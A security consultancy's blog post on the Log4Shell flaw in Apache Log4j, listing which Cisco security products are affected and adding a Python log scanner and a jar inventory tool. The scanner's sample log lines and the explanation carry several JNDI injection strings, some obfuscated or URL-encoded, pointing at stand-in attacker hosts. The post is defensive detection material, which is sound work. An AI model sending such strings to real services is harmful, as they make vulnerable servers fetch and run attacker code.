Most vendors build on open source libraries, which are the workhorse of modern software. We share and reuse well-settled solutions and libraries that rest on proven research. Science says "nothing is perfect, but we strive to make it less wrong"; in networking and software terms, that means we need a patch.
As we at AFS deal predominantly with network security, below we outline the vulnerable products and the patches you need to apply (if you are the administrator) for one major network security and firewall vendor, Cisco Systems.
What is Log4j:
Apache Log4j is a Java-based logging utility and part of the Apache Logging Services project of the Apache Software Foundation. It is one of several Java logging frameworks and is used in thousands of software products on the market today.
What is vulnerable:
“In Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
In plainer language: an attacker who can get a specially crafted string such as ${jndi:ldap://attacker-host/x} written into a log (through an HTTP header, a username, a search term, or any other field the application logs) makes the vulnerable Log4j instance resolve that lookup, contact the attacker's LDAP server, and load and execute the Java class it points to. Because the input only has to be logged, this usually needs no authentication at all. The vulnerability is tracked as CVE-2021-44228 and is widely known as Log4Shell.
What makes it worse is that once a proof of concept (PoC) of the exploit was published, everyone in the business realised that it is trivial to use. Because Java, and Log4j with it, is embedded in so many products, identifying the affected systems, confirming whether they are actually vulnerable and patching them is an extremely time-consuming process, while attackers can scan for and exploit vulnerable systems at scale with the ready-made exploit.
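To make that pattern concrete for whoever watches the logs, here is an added example (not code from the original post, nor from Cisco or Apache) that runs the detection logic over a few constructed web-server access-log lines. Attackers rarely send the literal string ${jndi: in the clear; they wrap it in nested lookups such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} and URL-encode it, so the example normalises those forms before matching and then reports the scheme and target host of each lookup. The log lines, IP addresses and hostnames are constructed for the example.

```python
"""Scan access-log lines for Log4j JNDI lookup strings (CVE-2021-44228).

Added example for this post; not code from Cisco or Apache. The log lines and
hosts below are constructed for the demonstration.
"""
import re
import urllib.parse

# ${lower:x} / ${upper:x} resolve to the single character x.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${missingkey:-x}, including the empty-key form ${::-x}, resolves to the default x.
# The lookahead leaves a real ${jndi:...} lookup intact so it can be matched afterwards.
DEFAULT_VALUE = re.compile(r"\$\{(?!\s*jndi)[^{}]*?:-([^{}]*)\}", re.IGNORECASE)
# After normalisation, the lookup we care about: ${jndi:<scheme>://<host>...}
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*/*(?P<host>[^/\s}]*)", re.IGNORECASE
)

# Constructed sample: one benign request, four attack variants, one harmless lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:37:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:13:37:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:13:37:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://evil.example:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:13:37:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://evil.example:1099/c}"',
    '198.51.100.10 - - [10/Dec/2021:13:37:05 +0000] "GET /%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fd%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.4 - - [10/Dec/2021:13:37:06 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 10 "-" "-"',
]


def normalize(text):
    """Undo URL encoding and collapse nested lookups from the inside out.

    Each pass rewrites only lookups that contain no further braces, so the loop
    resolves ${${lower:j}ndi:...} step by step until nothing changes any more.
    """
    for _ in range(3):  # double encoding is common; stop once decoding is stable
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(r"\1", text)
        text = DEFAULT_VALUE.sub(r"\1", text)
    return text.lower()


def scan_log(lines):
    """Return one finding per line that carries a JNDI lookup: line number, scheme, host."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(normalize(line))
        if match:
            findings.append({
                "line": number,
                "scheme": match.group("scheme"),
                "host": match.group("host"),
                "raw": line,
            })
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi {hit['scheme']} lookup towards {hit['host']}")
```

The host field is what you pivot on next: a JNDI lookup towards a host you do not own is an attack attempt whether or not the target was vulnerable, and the same host should then be searched for in outbound LDAP, RMI or DNS traffic from the servers that logged it.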
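Cisco appliances are fixed through vendor releases, but the identification step above is mostly an inventory problem on your own Java systems, and a file-name search misses log4j-core bundled inside a war, ear or shaded "fat" jar. The added example below (not code from the original post, nor from Cisco or Apache) walks a directory for archives, follows archives nested inside other archives, reads the Maven pom.properties of log4j-core to get the version, checks whether JndiLookup.class is still present (deleting that class from the jar was the documented interim mitigation), and flags the version range quoted above. The archives it creates in a temporary directory are constructed fixtures. Note that the check models only the range quoted on this page; follow-on advisories moved the recommended release to 2.17.1 or later, so compare what you find against the Apache security page linked below.

```python
"""Inventory log4j-core archives on disk and flag the version range quoted above.

Added example for this post; not code from Cisco or Apache. The archives it
creates are constructed fixtures that merely look like log4j-core to the scanner.
"""
import io
import re
import tempfile
import zipfile
from dataclasses import dataclass
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
FILENAME_VERSION = re.compile(r"log4j-core-(\d[\w.\-]*?)\.jar$", re.IGNORECASE)


@dataclass
class Finding:
    location: str            # outer path; nested archives are appended after "!"
    version: str             # "unknown" when neither pom.properties nor the file name says
    jndi_lookup_present: bool
    vulnerable: bool


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Pre-release tags are dropped."""
    core = text.split("-")[0]
    return tuple(int(part) for part in core.split(".") if part.isdigit())


def in_quoted_range(version):
    """CVE text quoted on this page: Log4j 2 up to and including 2.14.1, except 2.12.2.
    The follow-on fixes for 2.15.0 and 2.16.0 are deliberately not modelled here."""
    parsed = parse_version(version)
    return (2, 0) <= parsed <= (2, 14, 1) and parsed != (2, 12, 2)


def _read_version(zf, names, location):
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    match = FILENAME_VERSION.search(location)   # fallback: version in the file name
    return match.group(1) if match else "unknown"


def _scan_archive(zf, location, findings):
    names = set(zf.namelist())
    if POM_PROPS in names or FILENAME_VERSION.search(location):
        version = _read_version(zf, names, location)
        present = JNDI_LOOKUP in names
        # No JndiLookup.class means the interim mitigation was applied, so not vulnerable.
        # A log4j-core whose version cannot be determined is flagged for manual review
        # rather than silently passed.
        flagged = present and (version == "unknown" or in_quoted_range(version))
        findings.append(Finding(location, version, present, flagged))
    # Shaded/fat jars, wars and ears carry log4j-core as an inner archive: recurse.
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_archive(inner, f"{location}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root):
    """Walk a directory and return a Finding for every log4j-core archive found."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    _scan_archive(zf, path.as_posix(), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def fake_log4j_core(version, keep_jndi_lookup=True):
    """Constructed fixture: only the two entries the scanner looks at, nothing else."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if keep_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic, not a real class
    return buffer.getvalue()


def run_demo():
    """Build a small tree of constructed archives in a temp dir and scan it."""
    root = Path(tempfile.mkdtemp(prefix="log4j-demo-"))
    (root / "log4j-core-2.14.1.jar").write_bytes(fake_log4j_core("2.14.1"))
    (root / "log4j-core-2.14.1-stripped.jar").write_bytes(fake_log4j_core("2.14.1", keep_jndi_lookup=False))
    (root / "log4j-core-2.17.1.jar").write_bytes(fake_log4j_core("2.17.1"))
    with zipfile.ZipFile(root / "app.war", "w") as war:   # log4j hidden inside a web app
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_log4j_core("2.14.1"))
    return scan_tree(root)


if __name__ == "__main__":
    for finding in run_demo():
        status = "VULNERABLE" if finding.vulnerable else "ok"
        print(f"{status:10} {finding.version:8} jndi_lookup={finding.jndi_lookup_present} {finding.location}")
```

Run it against /opt, application deployment directories and any container image layers you extract; the nested-archive case is the one that usually surprises people, because the visible file is app.war or some-service.jar and nothing on disk is called log4j.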
Cisco products affected by Log4j
Cisco has published a list of its security products affected by Log4j, the most critical vulnerability of 2021.
AFS is here to help you evaluate your security posture and help you efficiently plan and patch the critical parts of your security infrastructure.
List of vulnerable Cisco security products:
If you use the products below, you need to apply the fixed release as soon as possible. Cisco has updated this advisory repeatedly as its investigation progressed, so check the current version of the advisory (linked below) before relying on either list.
- Cisco Firepower Threat Defense (FTD) managed by Firepower Device Manager (FDM)
- Cisco Identity Services Engine (ISE)
The products below are listed by Cisco as not vulnerable to this Log4j issue, so no Log4j patch is required for them (they still need their regular security updates).
Cisco Network and Content Security Devices NOT vulnerable:
- Cisco AMP Virtual Private Cloud Appliance
- Cisco Adaptive Security Appliance (ASA) Software
- Cisco Adaptive Security Device Manager
- Cisco Adaptive Security Virtual Appliance (ASAv)
- Cisco Advanced Web Security Reporting Application
- Cisco Email Security Appliance (ESA)
- Cisco FXOS Firepower Chassis Manager
- Cisco Firepower Management Center
- Cisco Firepower Next-Generation Intrusion Prevention System (NGIPS)
- Cisco Firepower Threat Defense (FTD) managed by Cisco Firepower Management Center
- Cisco Secure Email and Web Manager, formerly Cisco Content Security Management Appliance (SMA)
- Cisco Secure Network Analytics, formerly Stealthwatch
- Cisco Secure Services Proxy (CSSP)
- Cisco Security Malware Analytics Appliance, formerly Cisco Threat Grid Appliance
- Cisco Security Manager
- Cisco Web Security Appliance (WSA)
My network is affected, how do I patch?
Ask your managed services provider to do it, or contact a consultancy company. Whoever does it, the fix is the software release Cisco lists in the advisory for your product; until it is applied, keep the affected management interfaces (FDM and the ISE admin portal) reachable only from trusted management networks.
Conclusion:
It is not a straightforward process to stay properly informed about all security vulnerabilities, to know what to patch, when to patch and how to react each time a new one comes out (which happens quite often these days).
The AFS team is here to help; this is our expertise and we will be happy to help anyone seeking consultation, advice, a quick check, or patching. Just contact us!
Reference links:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
https://logging.apache.org/log4j/2.x/security.html